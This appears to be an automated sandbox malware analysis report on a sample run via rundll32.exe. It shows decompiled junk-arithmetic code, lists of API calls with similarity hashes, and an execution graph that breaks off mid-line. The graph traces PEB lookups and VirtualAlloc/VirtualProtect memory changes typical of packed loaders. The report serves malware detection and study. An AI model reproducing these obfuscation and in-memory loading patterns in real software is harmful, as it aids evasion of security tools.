                                                                      • Instruction Fuzzy Hash: 9B11E3B1C0020DFBDF04DFE4DA4689EBBB4FB40314F608599E814A62A1D7749B549F91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040F1ED, Relevance: 1.3, APIs: 1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 85%
                                                                      			E0040F1ED(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00412550(_t46);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x28beb0;
				_v16 = 0xe97b;
				_v16 = _v16 >> 3;
				_t59 = 0x47;
				_v16 = _v16 / _t59;
				_v16 = _v16 ^ 0x00001a39;
				_v12 = 0x2d01;
				_v12 = _v12 >> 8;
				_t60 = 0x3a;
				_v12 = _v12 / _t60;
				_v12 = _v12 ^ 0x000023d3;
				_v20 = 0xc5d9;
				_v20 = _v20 | 0x3e7a6da8;
				_v20 = _v20 ^ 0x3e7ad9f3;
				_v8 = 0x3ddd;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0xffffadd9;
				_v8 = _v8 ^ 0xffff8e91;
				E00407378(_t60, 0x171b6692, _t60, 0x90f109b3, 0x219);
				_t57 = CloseHandle(_a12); // executed
				return _t57;
			}













                                                                      0x0040f1f3
                                                                      0x0040f1f6
                                                                      0x0040f1f9
                                                                      0x0040f1fe
                                                                      0x0040f203
                                                                      0x0040f20a
                                                                      0x0040f213
                                                                      0x0040f21a
                                                                      0x0040f223
                                                                      0x0040f228
                                                                      0x0040f22d
                                                                      0x0040f234
                                                                      0x0040f23b
                                                                      0x0040f242
                                                                      0x0040f24a
                                                                      0x0040f24d
                                                                      0x0040f254
                                                                      0x0040f25b
                                                                      0x0040f262
                                                                      0x0040f269
                                                                      0x0040f270
                                                                      0x0040f274
                                                                      0x0040f27b
                                                                      0x0040f29a
                                                                      0x0040f2a5
                                                                      0x0040f2aa

                                                                      APIs
                                                                      • CloseHandle.KERNEL32(3E7AD9F3), ref: 0040F2A5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction ID: 2095a25752144cfccf41e96eaee5510c5b72647c39549051c61099ea1e271914
                                                                      • Opcode Fuzzy Hash: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction Fuzzy Hash: 701114B6D0020CEBDF05CFE5C84A9DEBBB5EB14308F108589E914A6290D3B59B649B80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00428330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00428361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004283A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction ID: 637bc979103a918286e5382f01602372abea4ab8c4984eea237f75ea849c2a86
                                                                      • Opcode Fuzzy Hash: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction Fuzzy Hash: AE11DF717023249FD320CF20AC44BABB7E8EB45B11F41453EED46D7240EBF5A8048BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004285AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004285E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction ID: 560c2e5531f95041473ab5abdf9a332d975f3a18d6c562c3f42fe07e166bb06b
                                                                      • Opcode Fuzzy Hash: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction Fuzzy Hash: 413150B2A02219AFDB00DFA5DC44AEF77BCAF55304F41452BF911E3240EB78D9148BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0042847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction ID: 605c18e4e1bdf3c56052bce9c4db53a3c74fed138b051222b05aff1404ffe72f
                                                                      • Opcode Fuzzy Hash: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction Fuzzy Hash: 0C11E4717023255FD720EF60AC44BABB7E8EB05320F41453EED459B240EBB4B84487AA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004284D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction ID: 99280014b4e7568ae5b78b7f4e1cfa4d9ca9bf2b7dd90ccdf1763cf76fa4773a
                                                                      • Opcode Fuzzy Hash: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction Fuzzy Hash: 6C11D671B02314AFD720DF65AC44BABB7E8EB05310F45493FED45D7240EBB5A8848BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004282E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004282F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction ID: f632a035e8c56aece19070c7510d802e9804e06d05fa250d5db15c947f9699d3
                                                                      • Opcode Fuzzy Hash: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction Fuzzy Hash: 4101A231302328AFDB009F51EC44B9E7B55EB40B54F85403EFD048B251DBB6AC058BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004281C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004281CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction ID: 7300420cbd37d90105d4b3cf7da4562c34fb93397a177b564f82ba5817a4c9b0
                                                                      • Opcode Fuzzy Hash: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction Fuzzy Hash: DB01A2313022249BD7109B14ED85B2BB794E741395F85806FEC04CB283DBB9EC528BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00462B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00462B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00462BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 00462BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 00462BCD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction ID: b5047ada5e6505b9d9b610dba3069aac40fc24b3776deae8b4cf26fcfcd54791
                                                                      • Opcode Fuzzy Hash: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction Fuzzy Hash: A3214A742046409FDB40DF59C9C1E5A77E8EB49310F158196F988CF2A6E779EC40CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 004614BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0F$`
                                                                      • API String ID: 701148680-3237207667
                                                                      • Opcode ID: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction ID: db70940b4a1f0617aeeac80f8a0c91bf787b1828615b15b28606ddd46ecba5aa
                                                                      • Opcode Fuzzy Hash: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction Fuzzy Hash: 13518476B006199BCB00DE5DD9854AF73B9AB48354F1D4026FD06D7360EA38DD02C7AB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004280E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00428110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction ID: 0ee67d0bb69f832fec1fca06a4eed47d1578d3d3e795e0a9096b3779754e9213
                                                                      • Opcode Fuzzy Hash: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction Fuzzy Hash: 4AF0F0303072204ADB105F38BE8163E7546A782374FE08A3FE126466D2DE7C8823824E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: rundll32.exe PID: 2512 Parent PID: 2428 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:2.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:940
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 4240 1ff0d7a 4251 1ff14c8 4240->4251 4241 1ff3c8e GetPEB 4241->4251 4243 1ff502c GetPEB 4243->4251 4244 1ff1699 4247 1ff502c GetPEB 4244->4247 4245 1ff16b5 4246 1ff5370 GetPEB 4246->4251 4247->4245 4249 2002982 GetPEB 4249->4251 4251->4241 4251->4243 4251->4244 4251->4245 4251->4246 4251->4249 4253 20002e1 GetPEB 4251->4253 4254 1ffc017 4251->4254 4267 200ca55 4251->4267 4274 1ff8e39 4251->4274 4278 1ff6b9a 4251->4278 4253->4251 4266 1ffc046 4254->4266 4256 1ff4a6f GetPEB 4256->4266 4257 1ffc6fd 4262 1ffd3f5 GetPEB 4257->4262 4258 1ffc70f 4258->4251 4260 1fff895 GetPEB 4260->4266 4262->4258 4263 1ffd3f5 GetPEB 4263->4266 4264 1ff502c GetPEB 4264->4266 4265 1ff96ca GetPEB 4265->4266 4266->4256 4266->4257 4266->4258 4266->4260 4266->4263 4266->4264 4266->4265 4282 1fffd1a 4266->4282 4286 1ffda03 4266->4286 4290 1ffe13c 4266->4290 4268 1ff96ca GetPEB 4267->4268 4269 200cb39 4268->4269 4270 1ffd4fe GetPEB 4269->4270 4271 200cb81 4270->4271 4272 2008f9b GetPEB 4271->4272 4273 200cb9c 4272->4273 4273->4251 4275 1ff8e67 4274->4275 4276 20036c4 GetPEB 4275->4276 4277 1ff8e8a 4276->4277 4277->4251 4279 1ff6bdf 4278->4279 4280 1ff68ec GetPEB 4279->4280 4281 1ff6c7e 4280->4281 4281->4251 4283 1fffd46 4282->4283 4284 1ff68ec GetPEB 4283->4284 4285 1fffdd9 4284->4285 4285->4266 4287 1ffda1f 4286->4287 4288 1ff68ec GetPEB 4287->4288 4289 1ffdab7 4288->4289 4289->4266 4291 1ffe182 4290->4291 4292 1ff68ec GetPEB 4291->4292 4293 1ffe212 4292->4293 4293->4266 3385 200b706 3386 200b80b 3385->3386 3387 200b85e 3386->3387 3393 20041ab 3386->3393 3397 20041c4 3393->3397 3395 2004411 3417 200c4a5 3395->3417 3397->3395 3398 200440f 3397->3398 3413 20017e1 3397->3413 3405 2009eda 3398->3405 3404 20002e1 GetPEB 3404->3398 3406 2009efa 3405->3406 3407 1ff4a6f GetPEB 3406->3407 3408 2009f94 3407->3408 3409 20002e1 3408->3409 3410 20002f3 3409->3410 3483 1ffd3f5 3410->3483 3414 20017fa 3413->3414 3430 1ff68ec 3414->3430 3418 200c4bb 3417->3418 3460 1ff4a6f 3418->3460 3421 1ff9c3d 3472 1ffbea5 3421->3472 3423 1ff9d8a 3426 2008e80 3423->3426 3427 2008e9f 3426->3427 3480 20036c4 3427->3480 3431 1ff69d8 3430->3431 3435 1ff6a04 3430->3435 3436 1fff797 3431->3436 3433 1ff69ee 3439 200ba51 3433->3439 3435->3397 3443 1ff27ec GetPEB 3436->3443 3438 1fff857 3438->3433 3441 200ba71 3439->3441 3440 200bb6d 3440->3435 3441->3440 3444 1ff177c 3441->3444 3443->3438 3445 1ff1905 3444->3445 3452 20095b0 3445->3452 3448 1ff1949 3450 1ff197a 3448->3450 3451 200ba51 GetPEB 3448->3451 3450->3440 3451->3450 3453 20095c9 3452->3453 3454 1ff68ec GetPEB 3453->3454 3455 1ff192f 3454->3455 3455->3448 3456 1ffe5c0 3455->3456 3457 1ffe5d3 3456->3457 3458 1ff68ec GetPEB 3457->3458 3459 1ffe671 3458->3459 3459->3448 3465 1ff7015 3460->3465 3466 1ff68ec GetPEB 3465->3466 3467 1ff4b11 3466->3467 3468 1ff90d2 3467->3468 3469 1ff90ec 3468->3469 3470 1ff68ec GetPEB 3469->3470 3471 1ff4b22 3470->3471 3471->3421 3473 1ffbec4 3472->3473 3474 1ff68ec GetPEB 3473->3474 3475 1ff9d3a 3474->3475 3475->3423 3476 200d623 3475->3476 3477 200d64a 3476->3477 3478 1ff68ec GetPEB 3477->3478 3479 200d6cb 3478->3479 3479->3423 3481 1ff68ec GetPEB 3480->3481 3482 2003737 3481->3482 3482->3404 3484 1ffd408 3483->3484 3485 1ff7015 GetPEB 3484->3485 3486 1ffd4e4 3485->3486 3489 1ff3011 3486->3489 3490 1ff302c 3489->3490 3491 1ff68ec GetPEB 3490->3491 3492 1ff30c0 3491->3492 3492->3387 4294 1ff5478 4296 1ff5777 4294->4296 4297 1ffd54c GetPEB 4296->4297 4299 1ff58db 4296->4299 4300 1ffe761 GetPEB 4296->4300 4301 200b63c GetPEB 4296->4301 4302 2003805 4296->4302 4306 2006fa5 4296->4306 4297->4296 4300->4296 4301->4296 4303 2003818 4302->4303 4304 1ff68ec GetPEB 4303->4304 4305 20038b6 4304->4305 4305->4296 4307 2006fc5 4306->4307 4308 1ff68ec GetPEB 4307->4308 4309 2007053 4308->4309 4309->4296 3493 1ff27f3 3494 1ff2809 3493->3494 3495 1ff68ec GetPEB 3494->3495 3496 1ff289c 3495->3496 3372 200f090 3373 200f0b5 3372->3373 3378 200e620 3373->3378 3375 200f1bf 3381 200eb40 VirtualProtect 3375->3381 3377 200f1f8 3379 200e661 3378->3379 3380 200e694 VirtualAlloc 3379->3380 3380->3375 3383 200eb95 3381->3383 3382 200ede6 3382->3377 3383->3382 3384 200edb8 VirtualProtect 3383->3384 3384->3383 3497 2004012 3498 200402f 3497->3498 3499 1ff4a6f GetPEB 3498->3499 3501 2004148 3499->3501 3500 200418d 3501->3500 3505 1ff5d63 3501->3505 3504 1ffd3f5 GetPEB 3504->3500 3516 1ff5d84 3505->3516 3506 1ff6716 3509 1ffd3f5 GetPEB 3506->3509 3507 1ffbf62 GetPEB 3507->3516 3511 1ff670f 3509->3511 3511->3500 3511->3504 3513 1ff4a6f GetPEB 3513->3516 3516->3506 3516->3507 3516->3511 3516->3513 3519 2002032 3516->3519 3523 1ff9038 3516->3523 3526 1ff5c8a 3516->3526 3530 200280b 3516->3530 3534 20011d8 3516->3534 3538 200883c 3516->3538 3542 1ff8c61 3516->3542 3520 2002052 3519->3520 3521 1ff68ec GetPEB 3520->3521 3522 20020c8 3521->3522 3522->3516 3524 1ff68ec GetPEB 3523->3524 3525 1ff90c5 3524->3525 3525->3516 3527 1ff5cb6 3526->3527 3528 1ff68ec GetPEB 3527->3528 3529 1ff5d50 3528->3529 3529->3516 3531 2002838 3530->3531 3532 1ff68ec GetPEB 3531->3532 3533 20028b5 3532->3533 3533->3516 3535 20011eb 3534->3535 3536 1ff68ec GetPEB 3535->3536 3537 2001293 3536->3537 3537->3516 3539 200885b 3538->3539 3540 1ff68ec GetPEB 3539->3540 3541 20088fe 3540->3541 3541->3516 3543 1ff8c91 3542->3543 3544 1ff68ec GetPEB 3543->3544 3545 1ff8d2e 3544->3545 3545->3516 3546 2002515 3551 2002529 3546->3551 3547 2002722 3551->3547 3555 2006158 3551->3555 3567 200b165 3551->3567 3577 1ffa323 3551->3577 3596 200cc7f 3551->3596 3606 1ff1983 3551->3606 3619 20034c3 3551->3619 3564 20064a7 3555->3564 3557 2006626 3557->3551 3559 2006628 3560 1ffd3f5 GetPEB 3559->3560 3560->3557 3561 1ff4a6f GetPEB 3561->3564 3564->3557 3564->3559 3564->3561 3565 20002e1 GetPEB 3564->3565 3627 1ff3c8e 3564->3627 3631 1ff5370 3564->3631 3635 1ff9a4b 3564->3635 3639 1ff598b 3564->3639 3649 200a6d9 3564->3649 3565->3564 3573 200b4a0 3567->3573 3568 200b624 3570 1ffd3f5 GetPEB 3568->3570 3569 1ff4a6f GetPEB 3569->3573 3571 200b610 3570->3571 3571->3551 3573->3568 3573->3569 3573->3571 3732 2009e33 3573->3732 3736 1ff85b2 3573->3736 3740 1ff50f1 3573->3740 3748 2000fbc 3573->3748 3773 1fff6fa 3577->3773 3579 1ff5370 GetPEB 3593 1ffaba3 3579->3593 3581 1ffaf43 3581->3551 3582 1ffaf45 3585 1ffd3f5 GetPEB 3582->3585 3584 200b060 GetPEB 3584->3593 3585->3581 3586 1ffd3f5 GetPEB 3586->3593 3587 20002e1 GetPEB 3587->3593 3588 200a6d9 GetPEB 3588->3593 3589 1ff4a6f GetPEB 3589->3593 3590 1ffe761 GetPEB 3590->3593 3592 1ff598b GetPEB 3592->3593 3593->3579 3593->3581 3593->3582 3593->3584 3593->3586 3593->3587 3593->3588 3593->3589 3593->3590 3593->3592 3594 1ff3c8e GetPEB 3593->3594 3776 20008cf 3593->3776 3783 200189f 3593->3783 3787 1ff39e1 3593->3787 3791 1ff4d48 3593->3791 3594->3593 3604 200cf95 3596->3604 3597 2009e33 GetPEB 3597->3604 3598 200d120 3599 1ffd3f5 GetPEB 3598->3599 3600 200d10c 3599->3600 3600->3551 3601 1ff4a6f GetPEB 3601->3604 3602 1ff85b2 GetPEB 3602->3604 3603 1ff50f1 GetPEB 3603->3604 3604->3597 3604->3598 3604->3600 3604->3601 3604->3602 3604->3603 3605 2000fbc GetPEB 3604->3605 3605->3604 3617 1ff205f 3606->3617 3607 1ff2335 3610 1ffd3f5 GetPEB 3607->3610 3609 1ff2321 3609->3551 3610->3609 3611 1ff4a6f GetPEB 3611->3617 3613 200a6d9 GetPEB 3613->3617 3616 1ff598b GetPEB 3616->3617 3617->3607 3617->3609 3617->3611 3617->3613 3617->3616 3618 1ffe761 GetPEB 3617->3618 3805 200891e 3617->3805 3814 1ffe81f 3617->3814 3817 2001372 3617->3817 3822 1ff28aa 3617->3822 3618->3617 3620 20035ca 3619->3620 3621 200a6d9 GetPEB 3620->3621 3622 1ff598b GetPEB 3620->3622 3623 20036a9 3620->3623 3625 20036a7 3620->3625 3626 1ff4a6f GetPEB 3620->3626 3621->3620 3622->3620 3624 1ffd3f5 GetPEB 3623->3624 3624->3625 3625->3551 3626->3620 3628 1ff3cb4 3627->3628 3629 1ff68ec GetPEB 3628->3629 3630 1ff3d4c 3629->3630 3630->3564 3632 1ff538b 3631->3632 3633 1ff4a6f GetPEB 3632->3633 3634 1ff53fd 3633->3634 3634->3564 3636 1ff9a72 3635->3636 3637 20036c4 GetPEB 3636->3637 3638 1ff9a91 3637->3638 3638->3564 3640 1ff59b9 3639->3640 3662 1ff4cc9 3640->3662 3647 1ffe761 GetPEB 3648 1ff5c48 3647->3648 3648->3564 3650 200abdd 3649->3650 3652 1ff5370 GetPEB 3650->3652 3654 200adb3 3650->3654 3658 200adb1 3650->3658 3659 20002e1 GetPEB 3650->3659 3682 1ffd54c 3650->3682 3686 1ffb340 3650->3686 3690 2001ba5 3650->3690 3698 2005f20 3650->3698 3702 200b060 3650->3702 3706 200b63c 3650->3706 3652->3650 3655 1ffe761 GetPEB 3654->3655 3655->3658 3658->3564 3659->3650 3663 1ff4ce1 3662->3663 3674 1ffff2c 3663->3674 3666 200ade2 3667 200ae1e 3666->3667 3668 1ff68ec GetPEB 3667->3668 3669 1ff5c3d 3668->3669 3669->3648 3670 1ffe761 3669->3670 3671 1ffe777 3670->3671 3672 1ff68ec GetPEB 3671->3672 3673 1ff5c68 3672->3673 3673->3647 3675 1ffff45 3674->3675 3678 200d7a6 3675->3678 3679 200d7c1 3678->3679 3680 1ff68ec GetPEB 3679->3680 3681 1ff4d40 3680->3681 3681->3666 3683 1ffd563 3682->3683 3710 200cbab 3683->3710 3687 1ffb356 3686->3687 3688 1ff68ec GetPEB 3687->3688 3689 1ffb3dd 3688->3689 3689->3650 3691 2001bbc 3690->3691 3714 1ff96ca 3691->3714 3699 2005f44 3698->3699 3700 1ff68ec GetPEB 3699->3700 3701 2005ff8 3700->3701 3701->3650 3703 200b082 3702->3703 3704 20036c4 GetPEB 3703->3704 3705 200b0a4 3704->3705 3705->3650 3707 200b66c 3706->3707 3708 1ff68ec GetPEB 3707->3708 3709 200b6ed 3708->3709 3709->3650 3711 200cbcc 3710->3711 3712 1ff68ec GetPEB 3711->3712 3713 1ffd5ae 3712->3713 3713->3650 3715 1ff68ec GetPEB 3714->3715 3716 1ff9769 3715->3716 3717 1ffd4fe 3716->3717 3718 1ff96ca GetPEB 3717->3718 3719 1ffd536 3718->3719 3720 2008f9b 3719->3720 3721 2008fd7 3720->3721 3721->3721 3722 2001d04 3721->3722 3724 1ffeadd 3721->3724 3722->3650 3725 1ffeaf3 3724->3725 3728 200afaf 3725->3728 3729 200afc2 3728->3729 3730 1ff68ec GetPEB 3729->3730 3731 1ffeb4c 3730->3731 3731->3721 3733 2009e49 3732->3733 3753 1ff0cb5 3733->3753 3737 1ff85d5 3736->3737 3738 1ff68ec GetPEB 3737->3738 3739 1ff8667 3738->3739 3739->3573 3741 1ff510e 3740->3741 3742 1ff534a 3741->3742 3757 2001f7b 3741->3757 3742->3573 3746 1ff5305 3746->3742 3747 1ff58e8 GetPEB 3746->3747 3747->3746 3751 2000fd0 3748->3751 3749 2001102 3749->3573 3750 1ffe5c0 GetPEB 3750->3751 3751->3749 3751->3750 3769 200453a 3751->3769 3754 1ff0ccf 3753->3754 3755 1ff68ec GetPEB 3754->3755 3756 1ff0d69 3755->3756 3756->3573 3758 2001f9c 3757->3758 3759 1ff68ec GetPEB 3758->3759 3760 1ff52e6 3759->3760 3760->3742 3761 1ff58e8 3760->3761 3762 1ff5901 3761->3762 3765 200d6e1 3762->3765 3766 200d6fe 3765->3766 3767 1ff68ec GetPEB 3766->3767 3768 1ff5983 3767->3768 3768->3746 3770 2004553 3769->3770 3771 1ff68ec GetPEB 3770->3771 3772 20045d6 3771->3772 3772->3751 3774 1ff68ec GetPEB 3773->3774 3775 1fff787 3774->3775 3775->3593 3777 20008e9 3776->3777 3778 2000b5a 3777->3778 3780 1ff4a6f GetPEB 3777->3780 3781 2000b58 3777->3781 3797 1ff37f6 3777->3797 3779 1ff37f6 GetPEB 3778->3779 3779->3781 3780->3777 3781->3593 3784 20018b2 3783->3784 3785 1ff68ec GetPEB 3784->3785 3786 2001928 3785->3786 3786->3593 3788 1ff3a17 3787->3788 3789 1ff68ec GetPEB 3788->3789 3790 1ff3ad0 3789->3790 3790->3593 3792 1ff4d77 3791->3792 3793 1ff4f7f 3792->3793 3794 1ff4a6f GetPEB 3792->3794 3795 1ff4f65 3792->3795 3793->3593 3794->3792 3801 1ffb046 3795->3801 3798 1ff381b 3797->3798 3799 1ff68ec GetPEB 3798->3799 3800 1ff38a6 3799->3800 3800->3777 3802 1ffb060 3801->3802 3803 1ff58e8 GetPEB 3802->3803 3804 1ffb0fb 3803->3804 3804->3793 3806 200895f 3805->3806 3809 1ff4cc9 GetPEB 3806->3809 3810 2008e18 3806->3810 3811 1ff5370 GetPEB 3806->3811 3813 20002e1 GetPEB 3806->3813 3830 